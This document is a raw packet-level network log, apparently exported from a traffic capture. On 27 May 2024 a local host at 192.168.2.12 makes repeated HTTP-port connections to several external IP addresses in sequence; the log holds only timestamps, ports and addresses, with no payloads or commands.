May 27, 2024 12:21:09.554388046 CEST	49731	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:09.559432030 CEST	80	49731	50.116.86.54	192.168.2.12
May 27, 2024 12:21:09.559565067 CEST	49731	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:09.561501026 CEST	49731	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:09.566381931 CEST	80	49731	50.116.86.54	192.168.2.12
May 27, 2024 12:21:10.125196934 CEST	80	49731	50.116.86.54	192.168.2.12
May 27, 2024 12:21:10.125825882 CEST	80	49731	50.116.86.54	192.168.2.12
May 27, 2024 12:21:10.125874996 CEST	49731	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:10.128402948 CEST	49731	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:10.133290052 CEST	80	49731	50.116.86.54	192.168.2.12
May 27, 2024 12:21:15.149704933 CEST	49732	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:15.154588938 CEST	80	49732	13.248.169.48	192.168.2.12
May 27, 2024 12:21:15.154663086 CEST	49732	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:15.157181978 CEST	49732	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:15.162107944 CEST	80	49732	13.248.169.48	192.168.2.12
May 27, 2024 12:21:15.616179943 CEST	80	49732	13.248.169.48	192.168.2.12
May 27, 2024 12:21:15.616364956 CEST	49732	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:16.660290956 CEST	49732	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:16.665370941 CEST	80	49732	13.248.169.48	192.168.2.12
May 27, 2024 12:21:17.679547071 CEST	49733	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:17.684602976 CEST	80	49733	13.248.169.48	192.168.2.12
May 27, 2024 12:21:17.685676098 CEST	49733	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:17.689939022 CEST	49733	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:17.694812059 CEST	80	49733	13.248.169.48	192.168.2.12
May 27, 2024 12:21:18.173595905 CEST	80	49733	13.248.169.48	192.168.2.12
May 27, 2024 12:21:18.178592920 CEST	49733	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:19.191658974 CEST	49733	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:19.196657896 CEST	80	49733	13.248.169.48	192.168.2.12
May 27, 2024 12:21:20.212898016 CEST	49734	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:20.217964888 CEST	80	49734	13.248.169.48	192.168.2.12
May 27, 2024 12:21:20.218040943 CEST	49734	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:20.222053051 CEST	49734	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:20.227001905 CEST	80	49734	13.248.169.48	192.168.2.12
May 27, 2024 12:21:20.227042913 CEST	80	49734	13.248.169.48	192.168.2.12
May 27, 2024 12:21:20.706643105 CEST	80	49734	13.248.169.48	192.168.2.12
May 27, 2024 12:21:20.706708908 CEST	49734	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:21.739536047 CEST	49734	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:21.748622894 CEST	80	49734	13.248.169.48	192.168.2.12
May 27, 2024 12:21:22.757893085 CEST	49735	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:22.764055014 CEST	80	49735	13.248.169.48	192.168.2.12
May 27, 2024 12:21:22.764117956 CEST	49735	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:22.767600060 CEST	49735	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:22.773058891 CEST	80	49735	13.248.169.48	192.168.2.12
May 27, 2024 12:21:23.232510090 CEST	80	49735	13.248.169.48	192.168.2.12
May 27, 2024 12:21:23.232677937 CEST	80	49735	13.248.169.48	192.168.2.12
May 27, 2024 12:21:23.236864090 CEST	49735	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:23.236864090 CEST	49735	80	192.168.2.12	13.248.169.48
May 27, 2024 12:21:23.241872072 CEST	80	49735	13.248.169.48	192.168.2.12
May 27, 2024 12:21:28.676009893 CEST	49736	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:28.681019068 CEST	80	49736	66.29.149.46	192.168.2.12
May 27, 2024 12:21:28.681086063 CEST	49736	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:28.683201075 CEST	49736	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:28.688225985 CEST	80	49736	66.29.149.46	192.168.2.12
May 27, 2024 12:21:29.305818081 CEST	80	49736	66.29.149.46	192.168.2.12
May 27, 2024 12:21:29.306102991 CEST	80	49736	66.29.149.46	192.168.2.12
May 27, 2024 12:21:29.310376883 CEST	49736	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:30.191736937 CEST	49736	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:31.210302114 CEST	49737	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:31.215655088 CEST	80	49737	66.29.149.46	192.168.2.12
May 27, 2024 12:21:31.215747118 CEST	49737	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:31.217624903 CEST	49737	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:31.222549915 CEST	80	49737	66.29.149.46	192.168.2.12
May 27, 2024 12:21:31.806731939 CEST	80	49737	66.29.149.46	192.168.2.12
May 27, 2024 12:21:31.807729006 CEST	80	49737	66.29.149.46	192.168.2.12
May 27, 2024 12:21:31.807957888 CEST	49737	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:32.722893953 CEST	49737	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:33.741807938 CEST	49738	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:33.746753931 CEST	80	49738	66.29.149.46	192.168.2.12
May 27, 2024 12:21:33.746860027 CEST	49738	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:33.750099897 CEST	49738	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:33.755558968 CEST	80	49738	66.29.149.46	192.168.2.12
May 27, 2024 12:21:33.755646944 CEST	80	49738	66.29.149.46	192.168.2.12
May 27, 2024 12:21:34.364387035 CEST	80	49738	66.29.149.46	192.168.2.12
May 27, 2024 12:21:34.364418983 CEST	80	49738	66.29.149.46	192.168.2.12
May 27, 2024 12:21:34.364478111 CEST	49738	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:35.255007029 CEST	49738	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:36.274148941 CEST	49739	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:36.279357910 CEST	80	49739	66.29.149.46	192.168.2.12
May 27, 2024 12:21:36.279421091 CEST	49739	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:36.281570911 CEST	49739	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:36.287904024 CEST	80	49739	66.29.149.46	192.168.2.12
May 27, 2024 12:21:36.891031027 CEST	80	49739	66.29.149.46	192.168.2.12
May 27, 2024 12:21:36.891176939 CEST	80	49739	66.29.149.46	192.168.2.12
May 27, 2024 12:21:36.891227961 CEST	49739	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:36.895442963 CEST	49739	80	192.168.2.12	66.29.149.46
May 27, 2024 12:21:36.900324106 CEST	80	49739	66.29.149.46	192.168.2.12
May 27, 2024 12:21:42.117219925 CEST	49740	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:42.122224092 CEST	80	49740	199.59.243.225	192.168.2.12
May 27, 2024 12:21:42.122339010 CEST	49740	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:42.127465010 CEST	49740	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:42.132399082 CEST	80	49740	199.59.243.225	192.168.2.12
May 27, 2024 12:21:42.589638948 CEST	80	49740	199.59.243.225	192.168.2.12
May 27, 2024 12:21:42.589668989 CEST	80	49740	199.59.243.225	192.168.2.12
May 27, 2024 12:21:42.589687109 CEST	80	49740	199.59.243.225	192.168.2.12
May 27, 2024 12:21:42.589747906 CEST	49740	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:42.589747906 CEST	49740	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:43.628740072 CEST	49740	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:44.651420116 CEST	49741	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:44.656809092 CEST	80	49741	199.59.243.225	192.168.2.12
May 27, 2024 12:21:44.656877995 CEST	49741	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:44.660775900 CEST	49741	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:44.665802002 CEST	80	49741	199.59.243.225	192.168.2.12
May 27, 2024 12:21:45.151304960 CEST	80	49741	199.59.243.225	192.168.2.12
May 27, 2024 12:21:45.151329994 CEST	80	49741	199.59.243.225	192.168.2.12
May 27, 2024 12:21:45.151345968 CEST	80	49741	199.59.243.225	192.168.2.12
May 27, 2024 12:21:45.151384115 CEST	49741	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:45.151429892 CEST	49741	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:46.175654888 CEST	49741	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:47.195477009 CEST	49742	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:47.200479984 CEST	80	49742	199.59.243.225	192.168.2.12
May 27, 2024 12:21:47.200550079 CEST	49742	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:47.203047037 CEST	49742	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:47.207988977 CEST	80	49742	199.59.243.225	192.168.2.12
May 27, 2024 12:21:47.208050013 CEST	80	49742	199.59.243.225	192.168.2.12
May 27, 2024 12:21:47.664019108 CEST	80	49742	199.59.243.225	192.168.2.12
May 27, 2024 12:21:47.664160967 CEST	80	49742	199.59.243.225	192.168.2.12
May 27, 2024 12:21:47.664263010 CEST	49742	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:47.665163994 CEST	80	49742	199.59.243.225	192.168.2.12
May 27, 2024 12:21:47.665275097 CEST	49742	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:48.706866026 CEST	49742	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:49.725717068 CEST	49743	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:49.731874943 CEST	80	49743	199.59.243.225	192.168.2.12
May 27, 2024 12:21:49.731959105 CEST	49743	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:49.733951092 CEST	49743	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:49.738876104 CEST	80	49743	199.59.243.225	192.168.2.12
May 27, 2024 12:21:50.197623014 CEST	80	49743	199.59.243.225	192.168.2.12
May 27, 2024 12:21:50.197640896 CEST	80	49743	199.59.243.225	192.168.2.12
May 27, 2024 12:21:50.197729111 CEST	80	49743	199.59.243.225	192.168.2.12
May 27, 2024 12:21:50.197758913 CEST	49743	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:50.197906971 CEST	49743	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:50.200762033 CEST	49743	80	192.168.2.12	199.59.243.225
May 27, 2024 12:21:50.205646038 CEST	80	49743	199.59.243.225	192.168.2.12
May 27, 2024 12:21:55.481944084 CEST	49744	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:55.486825943 CEST	80	49744	136.143.186.12	192.168.2.12
May 27, 2024 12:21:55.486891031 CEST	49744	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:55.489101887 CEST	49744	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:55.493993044 CEST	80	49744	136.143.186.12	192.168.2.12
May 27, 2024 12:21:56.101425886 CEST	80	49744	136.143.186.12	192.168.2.12
May 27, 2024 12:21:56.101452112 CEST	80	49744	136.143.186.12	192.168.2.12
May 27, 2024 12:21:56.101468086 CEST	80	49744	136.143.186.12	192.168.2.12
May 27, 2024 12:21:56.101521969 CEST	49744	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:56.101521969 CEST	49744	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:57.003751040 CEST	49744	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:58.022864103 CEST	49745	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:58.027967930 CEST	80	49745	136.143.186.12	192.168.2.12
May 27, 2024 12:21:58.028049946 CEST	49745	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:58.029963017 CEST	49745	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:58.034833908 CEST	80	49745	136.143.186.12	192.168.2.12
May 27, 2024 12:21:58.657164097 CEST	80	49745	136.143.186.12	192.168.2.12
May 27, 2024 12:21:58.657398939 CEST	80	49745	136.143.186.12	192.168.2.12
May 27, 2024 12:21:58.658648968 CEST	80	49745	136.143.186.12	192.168.2.12
May 27, 2024 12:21:58.658799887 CEST	49745	80	192.168.2.12	136.143.186.12
May 27, 2024 12:21:59.534961939 CEST	49745	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:00.553971052 CEST	49746	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:00.560556889 CEST	80	49746	136.143.186.12	192.168.2.12
May 27, 2024 12:22:00.561990976 CEST	49746	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:00.565164089 CEST	49746	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:00.572365999 CEST	80	49746	136.143.186.12	192.168.2.12
May 27, 2024 12:22:00.572447062 CEST	80	49746	136.143.186.12	192.168.2.12
May 27, 2024 12:22:01.165678978 CEST	80	49746	136.143.186.12	192.168.2.12
May 27, 2024 12:22:01.165743113 CEST	80	49746	136.143.186.12	192.168.2.12
May 27, 2024 12:22:01.165838957 CEST	49746	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:02.066222906 CEST	49746	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:03.084917068 CEST	49747	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:03.089947939 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:03.090221882 CEST	49747	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:03.092117071 CEST	49747	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:03.097085953 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:03.706110001 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:03.706132889 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:03.706145048 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:03.706160069 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:03.706223965 CEST	49747	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:03.710835934 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:03.710850000 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:03.710932970 CEST	49747	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:03.713850021 CEST	49747	80	192.168.2.12	136.143.186.12
May 27, 2024 12:22:03.718713045 CEST	80	49747	136.143.186.12	192.168.2.12
May 27, 2024 12:22:09.427386999 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:09.439615965 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.439764023 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:09.441957951 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:09.446902990 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978420019 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978441000 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978454113 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978466988 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978486061 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978498936 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978511095 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978523970 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978534937 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978548050 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.978626966 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:09.978626966 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:09.978626966 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:09.978626966 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:09.983711958 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.983767033 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.984213114 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:09.995768070 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.995809078 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:09.996151924 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:10.068984032 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:10.068996906 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:10.069010019 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:10.069019079 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:10.069091082 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:10.069137096 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:10.069137096 CEST	80	49748	216.40.34.41	192.168.2.12
May 27, 2024 12:22:10.070050001 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:10.956756115 CEST	49748	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:11.975857019 CEST	49749	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:11.980950117 CEST	80	49749	216.40.34.41	192.168.2.12
May 27, 2024 12:22:11.981102943 CEST	49749	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:11.983424902 CEST	49749	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:12.285367012 CEST	49749	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:12.894186020 CEST	49749	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:13.038290024 CEST	80	49749	216.40.34.41	192.168.2.12
May 27, 2024 12:22:13.038346052 CEST	49749	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:13.038945913 CEST	80	49749	216.40.34.41	192.168.2.12
May 27, 2024 12:22:13.038954973 CEST	80	49749	216.40.34.41	192.168.2.12
May 27, 2024 12:22:13.040195942 CEST	80	49749	216.40.34.41	192.168.2.12
May 27, 2024 12:22:13.489485979 CEST	49749	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:13.496769905 CEST	80	49749	216.40.34.41	192.168.2.12
May 27, 2024 12:22:13.498409033 CEST	49749	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:14.508125067 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:14.516149044 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:14.516222954 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:14.518723011 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:14.534817934 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:14.538492918 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:14.538542032 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:14.539828062 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024204016 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024225950 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024302006 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.024525881 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024538994 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024549961 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024560928 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024574041 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024579048 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.024585962 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024600029 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024605036 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.024612904 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.024620056 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.024672031 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.029238939 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.029273033 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.029320955 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.041277885 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.041307926 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.041346073 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.110996962 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.111032963 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.111043930 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.111057043 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.111092091 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.111119032 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:15.111274004 CEST	80	49750	216.40.34.41	192.168.2.12
May 27, 2024 12:22:15.111325026 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:16.035347939 CEST	49750	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:17.054023981 CEST	49751	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:17.059122086 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.059246063 CEST	49751	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:17.061400890 CEST	49751	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:17.067477942 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.548943043 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.548973083 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.548986912 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.549000025 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.549034119 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.549057961 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.549067020 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.549094915 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:17.549304008 CEST	49751	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:17.549304008 CEST	49751	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:17.555033922 CEST	49751	80	192.168.2.12	216.40.34.41
May 27, 2024 12:22:17.559931993 CEST	80	49751	216.40.34.41	192.168.2.12
May 27, 2024 12:22:22.880919933 CEST	49752	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:22.885932922 CEST	80	49752	185.215.4.44	192.168.2.12
May 27, 2024 12:22:22.886002064 CEST	49752	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:22.887981892 CEST	49752	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:22.892848015 CEST	80	49752	185.215.4.44	192.168.2.12
May 27, 2024 12:22:23.537396908 CEST	80	49752	185.215.4.44	192.168.2.12
May 27, 2024 12:22:23.539232969 CEST	80	49752	185.215.4.44	192.168.2.12
May 27, 2024 12:22:23.539305925 CEST	49752	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:24.394294024 CEST	49752	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:25.412823915 CEST	49753	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:25.417782068 CEST	80	49753	185.215.4.44	192.168.2.12
May 27, 2024 12:22:25.423393965 CEST	49753	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:25.427316904 CEST	49753	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:25.432208061 CEST	80	49753	185.215.4.44	192.168.2.12
May 27, 2024 12:22:26.076365948 CEST	80	49753	185.215.4.44	192.168.2.12
May 27, 2024 12:22:26.082500935 CEST	80	49753	185.215.4.44	192.168.2.12
May 27, 2024 12:22:26.082798004 CEST	49753	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:26.941421032 CEST	49753	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:28.054137945 CEST	49754	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:28.059190989 CEST	80	49754	185.215.4.44	192.168.2.12
May 27, 2024 12:22:28.059283018 CEST	49754	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:28.061499119 CEST	49754	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:28.066338062 CEST	80	49754	185.215.4.44	192.168.2.12
May 27, 2024 12:22:28.066462040 CEST	80	49754	185.215.4.44	192.168.2.12
May 27, 2024 12:22:28.734328985 CEST	80	49754	185.215.4.44	192.168.2.12
May 27, 2024 12:22:28.734442949 CEST	80	49754	185.215.4.44	192.168.2.12
May 27, 2024 12:22:28.734565973 CEST	49754	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:29.567321062 CEST	49754	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:30.590847015 CEST	49755	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:30.595786095 CEST	80	49755	185.215.4.44	192.168.2.12
May 27, 2024 12:22:30.595859051 CEST	49755	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:30.598040104 CEST	49755	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:30.603140116 CEST	80	49755	185.215.4.44	192.168.2.12
May 27, 2024 12:22:31.375857115 CEST	80	49755	185.215.4.44	192.168.2.12
May 27, 2024 12:22:31.375880957 CEST	80	49755	185.215.4.44	192.168.2.12
May 27, 2024 12:22:31.381825924 CEST	49755	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:31.381825924 CEST	49755	80	192.168.2.12	185.215.4.44
May 27, 2024 12:22:31.386780024 CEST	80	49755	185.215.4.44	192.168.2.12
May 27, 2024 12:22:36.595820904 CEST	49756	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:36.600785017 CEST	80	49756	199.59.243.225	192.168.2.12
May 27, 2024 12:22:36.600910902 CEST	49756	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:36.602850914 CEST	49756	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:36.607692003 CEST	80	49756	199.59.243.225	192.168.2.12
May 27, 2024 12:22:37.072458982 CEST	80	49756	199.59.243.225	192.168.2.12
May 27, 2024 12:22:37.072540998 CEST	80	49756	199.59.243.225	192.168.2.12
May 27, 2024 12:22:37.072556019 CEST	80	49756	199.59.243.225	192.168.2.12
May 27, 2024 12:22:37.072585106 CEST	49756	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:37.072624922 CEST	49756	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:38.112917900 CEST	49756	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:39.137902975 CEST	49757	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:39.143007040 CEST	80	49757	199.59.243.225	192.168.2.12
May 27, 2024 12:22:39.143070936 CEST	49757	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:39.147805929 CEST	49757	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:39.152692080 CEST	80	49757	199.59.243.225	192.168.2.12
May 27, 2024 12:22:39.605120897 CEST	80	49757	199.59.243.225	192.168.2.12
May 27, 2024 12:22:39.605153084 CEST	80	49757	199.59.243.225	192.168.2.12
May 27, 2024 12:22:39.605211973 CEST	49757	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:39.605829954 CEST	80	49757	199.59.243.225	192.168.2.12
May 27, 2024 12:22:39.605870962 CEST	49757	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:40.659778118 CEST	49757	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:41.678550005 CEST	49758	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:41.683597088 CEST	80	49758	199.59.243.225	192.168.2.12
May 27, 2024 12:22:41.683677912 CEST	49758	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:41.685619116 CEST	49758	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:41.690542936 CEST	80	49758	199.59.243.225	192.168.2.12
May 27, 2024 12:22:41.690665960 CEST	80	49758	199.59.243.225	192.168.2.12
May 27, 2024 12:22:42.146519899 CEST	80	49758	199.59.243.225	192.168.2.12
